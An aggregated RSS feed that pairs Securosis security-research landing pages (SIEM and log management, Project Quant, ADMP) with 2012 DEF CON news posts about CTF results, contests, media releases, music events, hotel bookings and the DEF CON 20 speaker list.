reverse engineering applications and content with Visual Forensic Analysis tools. Presentations --------- * Security + Agile = FAIL. Live presentation is here. * This presentation covers Major Enterprise Application Security. Podcasts, Webcasts and Multimedia

==> SIM, SIEM, and Log Management

http://securosis.com/feeds/research This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). This research page covers System Information Management (SIM), System Event Management (SEM), and Log Management technologies. Basically anything that collects events from application and host system log files, or provides analysis and reporting on those events. There will be a few other variants in the type of data collected, where it is collected from, and the speed and depth of analysis performed. As these three areas are morphing into one, we felt it would be best at this time to stop pretending they are “differentiated” things and talk about the common business problems they help customers address. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. SIEM, Today and Tomorrow is a look back at some of the evolutionary struggles of SIM/SEM, and what is happening with the market space today. 2. LogLogic Acquires Exaprotect. 3. It seems like every other post we mention SIM/SEM and Log Management. We get a briefing from a vendor nearly every week, and we both know and cover this space. Creating this research page, we realized just how few posts we have written that are dedicated to it. We will provide more in the coming weeks. General Coverage ------------ 1. Policies and Security Products, covering the expense of policy creation and maintenance. Presentations --------- 1. Adrian’s presentation on Meeting Compliance with SIM, SEM and Log Management provides an in-depth discussion of using SIM/SEM and Log Management products for meeting compliance, and offers practical tips in dealing with technical and process challenges. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products we are aware of in this area (including free tools). It does not imply endorsement, and is meant to assist you, should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Vendors ArcSight CA CISCO MARS eIQ ExaProtect IBM Intellitactics LogLogic LogRhythm NetForensics NetIQ NitroSecurity Quest InTrust RSA EnVision Sensage Symantec SSIM Tenable TriGeo Q1 Labs

==> Project Quant

http://securosis.com/feeds/research Project Quant is a special research project to develop a metrics model for measuring the costs and effectiveness of patch management. This page includes the research deliverables associated with the project. All of the draft materials and public feedback are available on the project Blog and Forums: * The Project Quant Blog and Landing Page * The Project Quant Forums Published project documents include: * Version 1.0 of the Project Quant Report * The Project Quant Survey Results Analysis Here are the raw survey results from the project’s Open Patch Management Survey: * Project Quant Raw Survey Results, September 2009. (Zip file includes summary results in Excel format, and full raw results in Excel and CVS formats.) * The survey is still active, and you can participate here.

==> ADMP: Application and Database Monitoring and Protection

http://securosis.com/feeds/research Applications and Database Monitoring and Protection: ADMP. What is it? It’s a different way to think about security for applications. It’s a unified approach to securing applications by examining all of the components at once, viewing security as an operational issue, and getting tools to talk to each other. It means looking at application security in context of the business rules around transaction processing, and not just from a generic network traffic perspective. It is also a bit of prognostication, recommendation, and evangelism on our part, all rolled up into one unified theory. This approach also defocuses from some of the more traditional network and platform security models, and looks at the data and how applications process transactions and data. ADMP is essentially the data center branch of information-centric security, and it combines elements of data and application security into a consistent and specific architecture. The goal is to watch application transactions from the browser through the database, and apply security controls that actually ‘understand’ what’s going on. Our definition is: Products that monitor all activity in a business application and database, identify and audit users and content, and, based on central policies, protect data based on content, context, and/or activity. Papers and Posts ------------ 1. The lead-in to this series of thought is Rich’s posts on The Future Of Application and Database Security, Part 1 and Part 2. 2. Definitions: Content Monitoring and Protection And Application and Database Monitoring and Protection. 3. What is my motivation, or Why Are We Talking About ADMP. 4. ADMP and Assessment: Linking preventative and detective technologies. 5. ADMP: A Policy Driven Example. 6. Web Application Security: We Need Web Application Firewalls to Work. Better. 7. It’s Time To Move Past Vulnerability Scanning To Anti-Exploitation. Presentations --------- * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

==> CTF Call for Organizers Reminder

https://www.defcon.org/defconrss.xml Does your group have what it takes to be the new DEF CON Capture the Flag Organizers? There are still a couple of months left to apply, the call ends Feb 28, 2013. Instructions on how to apply at: https://forum.defcon.org/showthread.php?t=13160

==> Cyber Monday Sale at Hackerstickers.com!

https://www.defcon.org/defconrss.xml DEF CON & Cyber Monday Sale - Check out the special savings (Up to 60% OFF) site-wide on HackerStickers.com! Use coupon code 'FREESTICK' for free sticker with purchase!

==> DEF CON 20 P2P Collections of Speeches!

https://www.defcon.org/defconrss.xml Happy Turkey Day! As a special Thanksgiving treat, we have posted eMule Collections and Torrents of the complete Audio and Slides Video Collections from DEF CON 20! You can find the links at https://media.defcon.org/index.html#dc20. Leech away and give thanks for all that hacking goodness!

==> DEF CON 20 Slides Video and Audio is Live!

https://www.defcon.org/defconrss.xml The long-awaited moment has arrived, and you can now grab all of the DEF CON 20 Video (slides only) and Audio presentations from the DEF CON 20 Archive page! We have also posted a Slides Video RSS and an Audio RSS for those who prefer to grab them that way! We will soon be posting Torrent and eMule links for the complete collections at media.defcon.org Enjoy!

==> Call for CTF Organizers!

https://www.defcon.org/defconrss.xml The call for new DEF CON Capture the Flag organizers is live on the forums! Does your group have what it takes to carry the torch with the infamous DEF CON CTF? https://forum.defcon.org/showthread.php?t=13160

==> DEF CON 20 Artwork for Download!

https://www.defcon.org/defconrss.xml If you enjoyed the artwork at DEF CON 20 on the floors, signs, swag and elswhere, we have put together a little package for you! It contains high res jpg files and is free for personal, non-commercial use! Print it out for your walls, make some computer wallpapers and enjoy! You can find it at: DEF CON 20 Hacking Conference Art (Zip file) Keep an eye out for more art from past DEF CONs in the future!

==> DEF CON 20 Hacker Pyramid and Hacker Jeopardy Video!

https://www.defcon.org/defconrss.xml We now have, for your viewing delight, video from Hacker Jeopardy and 10k Hacker Pyramid at DEF CON 20! This year's Hacker Jeopardy was Winn's last, so check out all the surprises he had in store! Enjoy! Hacker Jeopardy: eMule | Torrent Hacker Pyramid: eMule | Torrent You can also download them individually: DEF CON 20 Hacking Conference - Hacker Jeopardy 1 DEF CON 20 Hacking Conference - Hacker Jeopardy 2 DEF CON 20 Hacking Conference - Hacker Jeopardy 3 DEF CON 20 Hacking Conference - Hacker Jeopardy Final DEF CON 20 Hacking Conference - Hacker Pyramid 1 DEF CON 20 Hacking Conference - Hacker Pyramid 2

==> DEF CON 20 Updated DVD!

https://www.defcon.org/defconrss.xml We've updated the DEF CON 20 DVD with some extra stuff! Updated presentation materials are now on the DVD image, as well as badge firmware, and the missing textfiles in the Extra Bonus Features section! Direct Download (4.5GB)

==> DEF CON 20 SE CTF Report!

https://www.defcon.org/defconrss.xml Social-engineer.org has released a detailed report of the findings from DEF CON 20 Social Engineering CTF Battle of the SExes! http://www.social-engineer.org/?p=3106

==> Tamper Evident MacGyvers!

https://www.defcon.org/defconrss.xml the following YouTube video is a pretty awesome show of ingenuity, by one of the Tamper Evident Contest teams in the MacGyver category at DEF CON 20. Using only items in their hotel room, they attempt to defeat a number of tamper evident devices. Enjoy! http://www.youtube.com/watch?v=MUzPwXPzfHQ

==> DEF CON Behind the Scenes: Zebbler Encanti Decor!

https://www.defcon.org/defconrss.xml Cool video on the making of DEF CON 20 decor for the music events! http://vimeo.com/49428863

==> CTF Archives updated for DEF CON 20!

https://www.defcon.org/defconrss.xml Capture the Flag at DEF CON is a legendary contest of hacking skill, and has grown considerably over the past few years. 20 teams competed for the coveted title this year, and we've updated our CTF Archive page to include as many write-ups from the competion and qualification rounds as we could find. We've also included torrents of the raw pcaps and system image from the DEF CON 20 CTF team ACME PHARM on media.defcon.org, courtesy of @phaktor! These resources and write-ups are meant to not only preserve CTF history, but allow you to dig in and see what the contest is all about! Enjoy!

==> DEF CON 20 Music Compilation Release!

https://www.defcon.org/defconrss.xml Those that were at DEF CON 20 received a music CD along with the Con DVD. This music compilation featured incredible tracks by some extremely talented artists, written especially for this years show. We have now teamed up with Gravitas recordings to release the music comp as a digital download for free, or pay what you want, with all proceeds to benefit the EFF! Here is the Press release from Gravitas: For Immediate Release Contact: John@40HzMedia.com [mailto:John@40HzMedia.com] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Gravitas Presents DEF CON Compilation Free Download ft. Mochipet, MC Frontalot, Minibosses, Cryptex, and more! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File Under: Electronic / Rap / Glitch Hop Release Date: August 2nd, 2012 Downloadable MP3s:Please feel free to Various Artists - DEF CON XX Compilation DEF CON, one of the worlds largest and longest running hacking conferences, celebrates it's 20th year with an energetic and appropriately themed compilation, entitled "XX". Founder and head of the conference Jeff Moss, also known as Dark Tangent, tasked DEF CON "goon" and Muti Music artist Great Scott with curating the talent filled track selections; acknowledging that music can be pure hacker fuel. Glitch-hop producers AMB, Mochipet and Cryptex play alongside a myriad of other genre-gurus - including nerd-rockers Minibosses, tech-electro wizard High Sage, and nerdcore rap professionals MC Frontalot and Dual Core. Listening to this mix of hacker artists is like riding a wave of concentration as you find yourself zoning out to the ambient tones or letting the determining beats direct your fingers across the keyboard. One hundred percent of the proceeds from the sales go to the Electronic Frontier Foundation, a non-profit agency that advocates digital rights and fights for the first amendment against egregious government bills like SOPA and the Cybersecurity Act of 2012. We urge you to purchase the DEF CON XX Compilation and spread the word to your friends and family. Release artwork by DEF CON resident artist: Neil Kronenberg. Tracklist: 1. AMB - On the Run 2. Minibosses - Sports!!! 3. Dale Chase - SSH to Your Heart featuring Shannon Morse 4. Zebbler Encanti Experience - Data Mind 5. MC Frontalot - Secrets From the Future (Crimson Death Remix) 6. Mochipet - Domo's Bass Station 7. ytcracker - Hacker War 8. Great Scott - gr33tz 9. Royal Sapien - In Chicago in the Time of the Fair (Royal Sapien fork for DEF CON XX) 10. REGENERATOR - Slave (DEF CON Discipline Mix by Mach) 11. Dual Core - Fear and Chaos 12. Cryptex - Error 13. High Sage featuring Katy Rokit - Stuck on Ceazar's Challenge (KEW QEIMYUK QEIMYUK QEIM AYM) 14. bil bless - grimjaw (the hunt for the) Cover Art: http://40hzmedia.com/images/dc20-album-art.jpg Links: http://gravitasrecordings.com/ https://www.facebook.com/gravitasrecordings http://www.defcon.org/ Download/Stream Widgets: http://gravitasrecordings.bandcamp.com/album/DEF CON-xx-compilation

==> Let the Updates Begin!

https://www.defcon.org/defconrss.xml Greetings all! That was quite an event, wasn't it? We here at DEF CON HQ and our staff all around the country and the world are still reeling. Now that we've had a minute to catch our breath, we'll start posting all of the contest results, media, press, and more that have come out of DEF CON 20. Let's start with a round-up of some of the news that came from this years show. We've also started receiving contest results. Keep an eye peeled for more updates in the coming days and weeks!

==> Thanks, Everybody!

https://www.defcon.org/defconrss.xml DEF CON 20 is winding down, and it's been another great show. Thanks to everyone who took time out of their summer to attend, whether you're an old-timer or someone here for your first time. It takes a lot of dedicated people to pull off an event of this magnitude, and I want to take a moment to officially thank the crew made this for you. Show 'em a little love - there's no better team anywhere.

==> DEF CON 20 Entertainment Schedule is Now Live!

https://www.defcon.org/defconrss.xml Dope beats are essential to a healthy immune system and a sparkly brain. FACT. Information retention is vastly increased by combining DJ sets with contained bodies of cool, chlorinated water. FACT. The entertainment schedule for DEF CON 20 is up for your perusal, and it's pretty packed. There tons of bands, DJs and even an area to just chill and rest your weary neocortex. Music until the wee hours, from Thursday through Sunday. You can check out Minibosses, or Frontalot, or REGENERATOR or Mochipet. It's like one of those outdoor music festivals, but with enough sense to come inside. Face it. Where else do you get to see Keith Myers versus Zack Fasel in a battle of hacker DJs? Or a band composed entirely of DEF CON Goons? Or the ever-awesome Miss DJ Jackalope rocking the same party as Crystal Method? As always, planning is key - so go check out the schedule and schedule in your Recommended Daily Allowance of rhythm

==> DEF CON Swag Has a New Online Home - Welcome Hackerstickers.com!

https://www.defcon.org/defconrss.xml Hackerstickers.com is now the official online retailer of DEF CON merchandise. They carry the whole line, from T-shirts to Zippos. And also stickers. All that and they also carry picksets and a wide variety of caffeine delivery devices. If you're in the market for hacker swag, check out Hackerstickers. Tell 'em DEF CON sent ya.

==> DT's Tamper Evident Contest is Live!

https://www.defcon.org/defconrss.xml The world is full of 'tamper-proof' packaging. You're expected to trust it, but how strong are those measures, really? This is a contest about defeating these physical measures in a documentable, elegant fashion that leaves no trace of your attack. You can enter alone or with a team, and you can even enter the 'Unlimited 'class that allows you to use any tools or gear you can get your hands on. Registration is open in the Tamper Evident Signup Forum Thread. To learn the rules and get a feel for the contest, go to the Tamper Evident Contest Thread. Space is limited, so if you think this is a contest for you, get yourself signed up!

==> Short Story Contest Winners!

https://www.defcon.org/defconrss.xml Thanks to everyone who participated in this year's Short Story Contest. It's cool to see how much literary talent is bubbling under the surface of the DEF CON community. This year's winners are: -People's Choice Winner - DEF CON Unbound by John McNabb -First Place - A Silent, Private Place by Davien -Second Place - DEF CON Unbound by John McNabb -Honorable Mention - DEF CON - The Beginning of the End by Siobahn Morrison To read the winning stories, and all of the participants, you can head over to the DEF CON Forums Short Story Contest thread. Congratulations to the winners!

==> DEF CON Art Contest Returns!

https://www.defcon.org/defconrss.xml This year's DEF CON art contest is going to be just a little different. First, you'll only have a few weeks to submit your masterpiece. All entries must be submitted by July 6th. That's a lot less lead time, but we're pretty sure pressure sharpens the mind. The theme is also going to be a little different. Since this is DEF CON's 20th anniversary, we're asking for poster-style artwork that imagines DEF CON 20 years from now. What do you think we'll be sharing with each other at DEF CON 40? What will hackery look like in 2032? You're free to share your vision, whether you tend toward kittens and lollipops or brutal post-human hellscapes. We'll share the best pieces with everyone through Facebook and the DEF CON website, and we'll post the winners in a prestigious spot at the con. So don't be shy - fire up your favorite digital artmaker and give your right brain a workout. Submission Deadline: All submissions must be received by July 6, 2012 Submit entries to: neil [at] defcon dot org Submission info to include: Real name (your identity must be verifiable to collect a prize) and desired nick/handle if any; and a title and description of your piece. Additional Specs: Maximum poster size 11"x17". Final entries should be in 300pi minimum .tif or .jpg format. Vector entries can be in .ai or .eps format. Delivery is the responsibility of the entrant, if the entry is too large to email you may post it online for download. Prizes: Entries will be judged together this year, with prizes for the top three finishers. 1st Place: Two Free admissions to DEF CON 20, and a $200 credit at the DEF CON Swag Booth. 2nd Place: Free admission to DEF CON 20, and a $100 credit at the DEF CON Swag Booth. 3rd Place: Free admission to DEF CON 20, and a $50 credit at the DEF CON Swag Booth.

==> Capture the Packet is Back!

https://www.defcon.org/defconrss.xml "Search Network Traffic, Locate Clues, Solve Puzzles and Score" Capture the Packet returns for a third year, and this time there's a Black Badge up for grabs! You can sign up your team (2 players max), learn the rules and read the FAQ by heading over to the DC20 CTP express sign-up page.

==> CTF Write-up Round-up!

https://www.defcon.org/defconrss.xml As promised, here are some links to write-ups of the past weekend's hot CTF qualification action. The biggest list of links I've seen is at the Deva [Me, Myself and InfoSec] blog. That's a good first stop. A few more links below. * From the VSzA Techblog, write-ups of the grab bag 300 and urandom 300 * From the Security Black Swan blog, a write-up of b 100, b 200 and urandom 300. * If you can read Chinese, Insight Labs has a writeup of Forensics 300 and b 300 If you know of an especially good writeup that's not on the list, let us know on Facebook or Twitter.

==> CTF Quals Results Are In!

https://www.defcon.org/defconrss.xml The CTF qualifications are complete, and it's time to announce the victors. The teams listed below have earned your respect and the opportunity to fight it out in Vegas. #|Score|Team 1 4900 Hates Irony 2 4800 PPP 3 4400 侍 4 4400 sutegoma2 5 4400 Shellphish 6 4400 TwoSixNine 7 4200 European Nopsled Team (DC 19 winner) 8 4100 More Smoked Leet Chicken 9 4100 our name sucks 10 4100 ACME Pharm 11 4100 WOWHACKER-PLUS We'll be scouring the Intertubes to bring you write-ups of the action, so watch this space. Thanks to everyone who participated, and congratulations to the winners. The game is afoot.

==> Vote for DC Recognize Awards!

https://www.defcon.org/defconrss.xml DEF CON is proud to announce the 2nd annual DEF CON awards ceremony, renamed the DC Recognize Awards. These awards are given to deserving individuals in the community, industry, and media. For DC20, we've shaken things up and included 7 different categories for your voting pleasure. Nominations will be held online, at SurveyMonkey, until July 10th. From July 11th until the conference, the DEF CON Awards Selection Committee will review all the nominations for validity and evidence. The top group of nominations that meet the nomination criteria, have the best justification, and are generally worthwhile will be presented for voting during the DEF CON Recognize Awards Ceremony at DEF CON. All nominated individuals will be invited to the ceremony to receive their award in person, and provide a short "Thank you!" or "justification". To ensure your nomination is not discarded, include as much vital information as possible for your nomination. Links to stories, articles, media, or other evidence (product information, blogs, etc) should be included. Be sure to attend the DC Recognize Awards Ceremony at DEF CON to vote for your choice in each of the 7 categories! Your hosts again this year will be Jericho, Jeff Moss, and Russ Rogers. You can get your nominations in at the DEF CON Recognize Award Nomination Form!

==> Check Out Our New Vendor Page!

https://www.defcon.org/defconrss.xml The DEF CON Vendor Area never disappoints. There's always an eclectic mix of merchandise to paw through, from cutting-edge reading material to mutant hardware custom-made for the apocalypse. This year we'll be featuring the vendors on a page of their own, so that you can get to know them before the Con. We'll update as the list grows, so keep an eye peeled. Check the DEF CON 20 Vendor Page .

==> Social Engineering CTF Contest for Kids!

https://www.defcon.org/defconrss.xml Running to find the clues... racing to pick the locks, cracking codes, breaking ciphers and frantically fighting against the clock? This is not the theme of the latest Mission Impossible movie. No, this it the theme of the DEF CON 20 Social Engineering Capture the Flag for Kids - Return of the Schmooze. Here is the Cliff's Notes version. If you: * are 6-16 years of age * think outside of the box * enjoy challenges that will test your limits * want to race the clock to solve mind-bending puzzles * want to learn how to pick locks, solve ciphers, break code and use social engineering in your everyday life * enjoy cool prizes This competition will give you all the tools and instruction you need to learn these skills and many more. Although the contest will challenge you, it will be fun, entertaining and very educational. Then you have no choice, grab your parents and head over the registration page below and fill out all the details. Then it's time to get your brains ready for RETURN OF THE SCHMOOZE! Register Here, NOW!

==> DEF CON 20 Documentary and Call for DEF CON History!

https://www.defcon.org/defconrss.xml As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! Jason has made an announcement about it on his blog at ascii.textfiles.com, so go check out what it's all about! Near the end of the post, he asks for your help finding various pieces of DEF CON history, lore and artifacts. So if you have any of the footage or pictures listed, please help him out!

==> DEF CON 20 Speaker Page is Live! First round posted!

https://www.defcon.org/defconrss.xml The first round of Speakers is now live on the DEF CON 20 Speaker Page for your perusal! Enough said, now go and check 'em out! Welcome & Making the DEF CON 20 Badge + Special Presentation by Jason Scott The Dark Tangent, LosT, and Jason Scott DEF CON 101 Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director Jeremy Zerechak Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors Joe Kawasaki, Sidney Sherman, and Actors To Be Announced Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte "MIT Mike" Aponte Owning Bad Guys {And Mafia} With Javascript Botnets Chema Alonso and Manu "The Sur" <ghz or bust: defcon atlas Overwriting the Exception Handling Cache PointerDwarf Oriented Programming Rodrigo Rubira Branco, James Oakley, and Sergey Bratus Tenacious Diggity: Skinny Dippin in a Sea of Bing Francis Brown and Rob Ragan Exploit Archaeology: Raiders of the Lost Payphones Josh Brashars Panel: Meet the Feds Panelists To Be Announced Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement Greg Conti, Lisa Shay, and Woody Hartzog DEF CON Awards Hacking Humanity: Human Augmentation and You Christian "quaddi" Dameff, Jeff "r3plicant" Tully Sploitego - Maltego's (Local) Partner in Crime Nadeem Douba Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework Egypt Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions Andrew Gavin, Michael Baucom, and Charles Smith More Projects of Prototype This! Joe Grand and Zoz Crypto and the Cops: the Law of Key Disclosure and Forced Decryption Marcia Hofmann Black Ops Dan Kaminsky Owning One to Rule Them All Dave Kennedy and Dave DeSimone Detecting Reflective Injection Andrew King An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets James Kirk TBA Moxie Marlinspike Skype VoIP Software Vulnerabilities: Advanced 0Day Exploitation Benjamin Kunz Mejri Defcon Comedy Jam V, V for Vendetta David Mortman, Rich Mogull, Chris Hoff, Dave Maynor, Larry Pesce, and James Arlen Cortana: Rise of the Automated Red Team Raphael Mudge Panel: The Making of DEF CON 20 Hacker + Airplanes = No Good Can Come Of This RenderMan MegaUpload: Guilty or Not Guilty? Jim Rennie and Jennifer Granick Spy vs. Spy: Spying on Mobile Device Spyware Michael Robinson and Chris Taylor Bruce Schneier Answers Your Questions Bruce Schneier Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data Christopher Soghoian, Ben Wizner, Catherine Crump, and Ashkan Soltani Can Twitter Really Help Expose Psychopath Killer Traits? Chris "TheSuggmeister" Sumner Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future Richard Thieme Safes and Containers: Insecurity Design Excellence Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis TBA Paul Vixie

==> Elite Force is Playing DEF CON 20!

https://www.defcon.org/defconrss.xml Elite Force We have another major addition to the Saturday night DEF CON White Ball music line-up alongside The Crystal Method! DEF-CON is excited to bring renowned breaks+tech-funk act Elite Force to resonate your ears and chest cavity. Recently most well known for his RE:VAMPED series re-working such artists as Aphex Twin, Propellerheads, Meat Katie, Datsik, and many many others, Elite Force has been an established hacker friendly act for years. In fact, you may have heard of him through one of his earlier projects: Lunatic Calm (with the hit song "Leave You Far Behind," featured on movie soundtracks like The Jackal, Mortal Kombat Annihilation, and The Matrix). Official Website: http://www.eliteforcemusic.com/ Soundcloud: http://soundcloud.com/elite-force Videos: 1) Elite Force - Society Suicides: http://www.youtube.com/watch?v=nceAGqfdykQ 2) Elite Force - Captain America: http://www.youtube.com/watch?v=vWkJ7nYE0cU 3) Elite Force - Law of Life: http://www.youtube.com/watch?v=oWnjVRobf0w 4) Elite Force - Mainframe Wrekka: http://www.youtube.com/watch?v=z3d6MMp9Gjk 5) Lunatic Calm - Leave You Far Behind: http://www.youtube.com/watch?v=maP6q3D4Hf0

==> DEF CON Extended Room Block at Rio is almost SOLD OUT!

https://www.defcon.org/defconrss.xml Peak nights Friday and Saturday are almost gone. You can still save money and be at Rio by booking the nights available at our discounted rate and then paying the Rio rate for any nights that are no longer available in our Block. When Friday and Saturday are sold out in our block the Rio rate of 7/27 at $299 and 7/28 at $329 will show up on your reservation. These rates are subject to change based on availability. Or we have rooms at Bally's Starting on May 4th we will have overflow rooms at Bally's. There is a shuttle between Bally's and Rio That runs all day and into the evening. Rates at Bally's are as follows: Wednesday 7/25 $70.00 Thursday 7/26 $70.00 Friday 7/27 $150.00 Saturday 7/28 $150.00 Sunday 7/29 $70.00 To book at Bally's, use this link: http://www.totalrewards.com/hotel-reservations?propCode=BLV&groupCode=SBDEF2 Or call 1-800-358-8777 and reference group code SBDEF2

==> More Rooms at the Rio!

https://www.defcon.org/defconrss.xml Limited additional room block open at Rio for DEF CON attendees. Save $100.00 per night for the weekend nights! Wednesday night $138.00 Thursday night $158.00 Friday & Saturday nights $178.00 Act now before they are gone! If you made your reservation during the time our block was filling up and you paid a higher rate for one or more nights the Rio has already adjusted your rate to the new current / lower rate.

==> Press Registration for DEF CON 20!

https://www.defcon.org/defconrss.xml Journalists! Want to register as press for DEF CON 20? Check out the new Press Registration page for the rules and how you can apply for a press badge at DEF CON!

==> Reminders and New Pre-con Calendar

https://www.defcon.org/defconrss.xml As DEF CON 20 planning revs in to high gear, we thought it might be useful to have a central location for important pre-con dates and deadlines. Enter the Pre-con Calendar, a new page for keeping track of just such dates! Have a look, and if you have a contest or event, with deadlines before con, that could use an entry on the calendar, send it to neil {at} defcon }dot{ org. Check back there frequently for new dates! Here are some of the upcoming dates you may want to remember: * April 15 - Vendor Application Opens * April 30 - Call for Music Closes * May 1 - Contest & Event RFI Closes * May 28 - Call for Papers Closes * June 1-3 - CTF Quals * June 8 - Printed Program Materials Due

==> DEF CON 20 CTF Updates!

https://www.defcon.org/defconrss.xml News from the CTF front! The announcement of the DEF CON 20 CTF Quals was recently announced, and will take place June 1-3, 2012. You can find the details at ddtek.biz! We have another recent qualifying team to announce, team LeetChicken has won the Codegate 2012 YUT Challenge, which automatically qualifies them for DEF CON 20 CTF! Congratulations to them! You can find all kinds of CTF info on the DEF CON 20 CTF Page, and tons of CTF links an write ups in the CTF Archive!

==> DEF CON 20 Site is Live!

https://www.defcon.org/defconrss.xml If you're looking for a central location for all the latest info on this year's DEF CON, you're in luck! The DEF CON 20 site is now live at https://www.defcon.org/html/defcon-20/dc-20-index.html!

==> 200 for 20

https://www.defcon.org/defconrss.xml We'd like to announce that the price for DEF CON 20 will be $200 USD. What will we do with our ill-gotten gains, you may ask? We're going to make the 20th anniversary of DEF CON one to remember. More special swag, great live music, help for the contests to grow, 20 teams for CTF, special speakers, and numerous other secret stuffs. Believe us when we say it'll be the most epic DEF CON ever! Want to get involved in making DEF CON 20 even more k-rad? Participate on the forums https://forum.defcon.org/

==> The Crystal Method at DEF CON 20!

https://www.defcon.org/defconrss.xml The Crystal Method As part of our 20th anniversary celebration, DEF CON is ecstatic to announce the headlining act for our Saturday evening White Ball: The Crystal Method! These guys are pioneers in the electronic music scene, with soundtrack appearances on movies like Spawn, Blade, The Replacement Killers, and many others. Here are some samples to tide you over: Drown in the Now feat. Matisyahu Comin Back Sine Language feat. LMFAO

==> Which Past Shirts Should We Re-print for DEF CON 20?

https://www.defcon.org/defconrss.xml We're thinking of doing a limited run of a few past shirts for sale at DEF CON, but which ones should we do? You can help us decide by checking out the gallery of past shirts on our Facebook page, and then voting for your favorite in our survey also on Facebook, or at: https://www.surveymonkey.com/s/defconshirts

==> Reboot Sneak Preview at DEF CON 20!

https://www.defcon.org/defconrss.xml Reboot poster We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film: "Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual. In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring." We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies. If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard. Watch the Trailer!

==> Special Music Events at DEF CON 20!

https://www.defcon.org/defconrss.xml mochipet Exciting news that is first in a series of many! DEF CON is officially announcing some big musical guests this year, the first of whom is breakcore/glitch/hip-hop all-star Mochipet! You'll be able to catch him at the DEF CON 20 official opening Thursday night pool party! Here are a few examples of Mochipet in action: Whomp-a-saurus bleep Mochipet Godzilla New Year Video by Savage Henry A Milli Girls - Mochipet (pseudo-NSFW)

==> CODE 2600 Showing at DEF CON 20!

https://www.defcon.org/defconrss.xml DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. Like the CODE 2600 Facebook page for more info! About the film: CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover. The Cast: Bruce Schneier, Chief Security Technology Officer, BT Jeff Moss, Founder Def Con and Black Hat Marcus Ranum, Chief Security Officer, Tenable Security Jennifer Granick, Civil Liberties Director, EFF Dr. Bob Lash, Original Member of the Homebrew Computer Club Eric Michaud, Founder, Pumping Station One Gideon Lenkey, Security, CEO RA Security Systems Lorrie Cranor, Cylab, Carnegie Mellon University Phil Lapsley, Phone Phreaking Expert, Author Robert Vamosi, Computer Security Journalist, Author Wallace Wang, Author, "Steal This Computer Book"

==> DEF CON 20 Contest & Events!

https://www.defcon.org/defconrss.xml We wanted to take a minute and point out some of the buzz around contests and events that are brewing on the DEF CON Forums and elsewhere. As you know, LosT @ Con Mystery Challenge will be returning for DEF CON 20, it looks like LosT may or may not already be seeding clues on Twitter (@1o57). The Unofficial DEF CON Shoot is looking pretty active in the planning stages. Other contests and events that have active forums are: 10,000 Hacker Pyramid Capture the Flag Project 2 Scavenger Hunt Schemaverse DEF CON 101 Goon Band Hardware Hacking Village Skytalks Wireless Village HackBus Toxic BBQ So head over to the Forums and see what's up! You can also keep up with all the updates as they occur on the DEF CON Twitter, The DEF CON RSS Feed, and the DEF CON Facebook Page!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml We have a brand spanking new Speaker's Corner for you, where Nikita gives her speaker liaison insight into what makes your CFP submission stand out! A must read for the aspiring or seasoned DEF CON submitter!

==> DEF CON 20 Contest & Event RFI

https://www.defcon.org/defconrss.xml The DEF CON 20 Contest & Event Request for Information is live! If you already run or want to run a contest or event at DEF CON 20, it's where to find all of the info you need to get your contest or event on the map! Check it out at: https://www.defcon.org/html/defcon-20/dc-20-contest-rfi.html

==> Book a Room at the Rio for DEF CON 20!

